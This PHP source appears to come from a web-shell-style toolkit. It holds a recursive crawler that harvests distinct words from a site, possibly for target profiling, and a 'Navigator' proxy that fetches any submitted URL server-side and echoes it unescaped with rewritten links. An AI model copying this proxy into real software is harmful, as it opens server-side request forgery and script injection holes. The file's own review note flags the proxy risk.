/**
 * Recursively crawl pages starting at $urL and collect the distinct words
 * found in their text.
 *
 * Each call echoes a progress dot, fetches $urL through getiT() and, when the
 * response's Content-Type contains "text/", records the URL in the global
 * $CheckedLinks, appends every not-yet-seen whitespace-separated word of the
 * tag-stripped body to the global $GrabedWords, and then follows every
 * <a href> found under /html/body with $level - 1.
 *
 * @param string $urL   URL of the page to fetch; relative links are resolved
 *                      against its scheme, host, port and directory.
 * @param int    $level Remaining recursion depth; 0 stops the crawl.
 *
 * @return int|null 0 when $level is 0, null in every other case.
 */
function Site2profile($urL, $level) {
    global $CheckedLinks, $GrabedWords;

    echo ".";
    @flush_buffers();

    if ($level == 0) {
        return 0;
    }

    // Tolerate callers that have not initialised the shared accumulators yet.
    if (!is_array($CheckedLinks)) {
        $CheckedLinks = array();
    }
    if (!is_array($GrabedWords)) {
        $GrabedWords = array();
    }

    if (in_array($urL, $CheckedLinks, true)) {
        return null;
    }

    $headers = array();
    // getiT() is defined elsewhere; presumably it returns the response body
    // and fills $headers by reference -- confirm against its definition.
    $con = getiT($urL, $headers);

    // A missing header is treated as "not text" instead of raising a notice.
    $contentType = isset($headers['Content-Type']) ? $headers['Content-Type'] : '';
    if (!is_string($contentType) || strpos($contentType, 'text/') === false) {
        return null;
    }
    $CheckedLinks[] = $urL;

    $html = (string) $con;

    // Keyed lookup gives O(1), exact-match de-duplication; a loose in_array()
    // would be quadratic and would treat e.g. "1e3" and "1000" as equal.
    $known = array_flip($GrabedWords);
    $words = preg_split('/\s+/', strip_tags($html), -1, PREG_SPLIT_NO_EMPTY);
    foreach ($words as $word) {
        $word = trim($word);
        if ($word !== '' && !isset($known[$word])) {
            $known[$word] = true;
            $GrabedWords[] = $word;
        }
    }

    // DOMDocument::loadHTML() rejects an empty string (ValueError on PHP 8).
    if (trim($html) === '') {
        return null;
    }

    // Collect parser diagnostics internally instead of silencing with "@".
    $previous = libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    $loaded = $dom->loadHTML($html);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    if (!$loaded) {
        return null;
    }

    // Pieces needed to turn relative links into absolute ones.
    $u = parse_url($urL);
    $scheme = '';
    $origin = '';
    $baseDir = '/';
    if (is_array($u) && !empty($u['scheme']) && !empty($u['host'])) {
        $scheme = $u['scheme'];
        $port = !empty($u['port']) ? ":" . $u['port'] : '';
        $origin = $scheme . "://" . $u['host'] . $port;

        $file = !empty($u['path']) ? $u['path'] : '/';
        if (substr($file, -1) === '/') {
            // The URL already names a directory; dirname() would drop a level.
            $baseDir = $file;
        } else {
            $dir = str_replace(DIRECTORY_SEPARATOR, '/', dirname($file));
            // Always end with exactly one slash so "dir" . "page" cannot fuse.
            $baseDir = rtrim($dir, '/') . '/';
        }
    }

    $xpath = new DOMXPath($dom);
    $anchors = $xpath->query("/html/body//a");
    if ($anchors === false) {
        return null;
    }

    foreach ($anchors as $anchor) {
        $link = trim($anchor->getAttribute('href'));

        // A fragment only addresses a position inside a page; drop it so the
        // same document is not fetched once per anchor.
        $hash = strpos($link, '#');
        if ($hash !== false) {
            $link = (string) substr($link, 0, $hash);
        }
        if ($link === '') {
            continue;
        }

        if (preg_match('#^https?://#i', $link)) {
            $target = $link;
        } elseif ($origin === '') {
            // Without a usable base URL a relative link cannot be resolved.
            continue;
        } elseif (substr($link, 0, 2) === '//') {
            // Protocol-relative link: reuse the current page's scheme.
            $target = $scheme . ':' . $link;
        } elseif (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $link)) {
            // mailto:, javascript:, tel:, ftp: ... are not crawlable pages.
            continue;
        } elseif ($link[0] === '/') {
            $target = $origin . $link;
        } else {
            $target = $origin . $baseDir . $link;
        }

        Site2profile($target, $level - 1);
    }

    return null;
}
/**
 * Render the "Navigator" form and, when a URL was submitted, fetch that page
 * and echo it with its href attributes rewritten.
 *
 * The form field is pre-filled with the submitted `urL` request value, or
 * with a default address when none was given. For a submitted URL the page
 * is fetched through getiT(); every `href=` / `HREF=` occurrence is then
 * rewritten via replace_stR() to `HrEf=` so that
 *   - mailto links are left pointing at their original target,
 *   - links starting with "http" are wrapped with hlinK("seC=px&urL=http"),
 *   - all remaining links are wrapped with hlinK() and prefixed by the
 *     directory URL of the fetched page.
 * The mixed-case `HrEf` spelling marks an attribute as already handled so a
 * later, more general rule does not match it again.
 *
 * Known limitation: links that are not "http..." or "mailto..." (for example
 * root-relative "/x" or "javascript:") are all prefixed with the page's
 * directory URL.
 *
 * NOTE(review): this fetches a caller-supplied URL from the server and echoes
 * the response unescaped; make sure the endpoint is access-controlled.
 *
 * @return void
 */
function pr0xy() {
    global $et, $hcwd;

    // Accept only a non-empty string; an array-valued parameter is ignored.
    $requested = '';
    if (!empty($_REQUEST['urL']) && is_string($_REQUEST['urL'])) {
        $requested = $_REQUEST['urL'];
    }

    // The value sits inside a single-quoted attribute, so single quotes must
    // be escaped too (ENT_QUOTES is not the default before PHP 8.1).
    $shown = $requested !== ''
        ? htmlspecialchars($requested, ENT_QUOTES)
        : 'http://www.edpsciences.org/htbin/ipaddress';

    echo "<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><form method='POST'><tr><td width='20%'><b>Navigator: </b><input type=text name=urL size=140 value='";
    echo $shown;
    echo "'>{$hcwd}<input type=submit class=buttons value=Go></form>{$et}";

    if ($requested === '') {
        return;
    }

    $u = parse_url($requested);
    if (!is_array($u)) {
        $u = array();
    }
    $scheme = !empty($u['scheme']) ? $u['scheme'] : 'http';
    $host = isset($u['host']) ? $u['host'] : '';
    $port = !empty($u['port']) ? ':' . $u['port'] : '';
    $file = !empty($u['path']) ? $u['path'] : '/';

    // Directory of the fetched page, normalised to "seg/seg" without leading
    // or trailing slashes so the base URL never contains "//" in its path.
    if (substr($file, -1) === '/') {
        $dir = $file;
    } else {
        $dir = str_replace('\\', '/', dirname($file));
    }
    $dir = trim($dir, '/');
    $base = "{$scheme}://{$host}{$port}/" . ($dir !== '' ? $dir . '/' : '');

    $con = getiT($requested);

    // hlinK() is defined elsewhere; presumably it returns a link back to this
    // script ending in the given query string -- confirm.
    $absolute = hlinK("seC=px&urL=http");
    $relative = hlinK("seC=px&urL={$base}");

    $attrs = array('href', 'HREF');
    // Opening delimiters seen in markup: double quote, single quote, a
    // backslash-escaped single quote (HTML inside script strings), or none.
    // The unquoted form is last because it is a prefix of the quoted ones.
    $quotes = array('"', "'", "\\'", '');

    // Order matters if replace_stR() applies the pairs sequentially: specific
    // rules (mailto, http) must run before the generic catch-all rules.
    $s = array();
    foreach ($attrs as $attr) {
        foreach ($quotes as $q) {
            $s["{$attr}={$q}mailto"] = "HrEf={$q}mailto";
        }
    }
    foreach ($attrs as $attr) {
        foreach ($quotes as $q) {
            $s["{$attr}={$q}http"] = "HrEf={$q}" . $absolute;
        }
    }
    foreach ($attrs as $attr) {
        foreach ($quotes as $q) {
            $s["{$attr}={$q}"] = "HrEf={$q}" . $relative;
        }
    }

    // replace_stR() is defined elsewhere; presumably it applies the
    // search => replacement map to the text -- confirm.
    $con = replace_stR($s, $con);
    echo $con;
}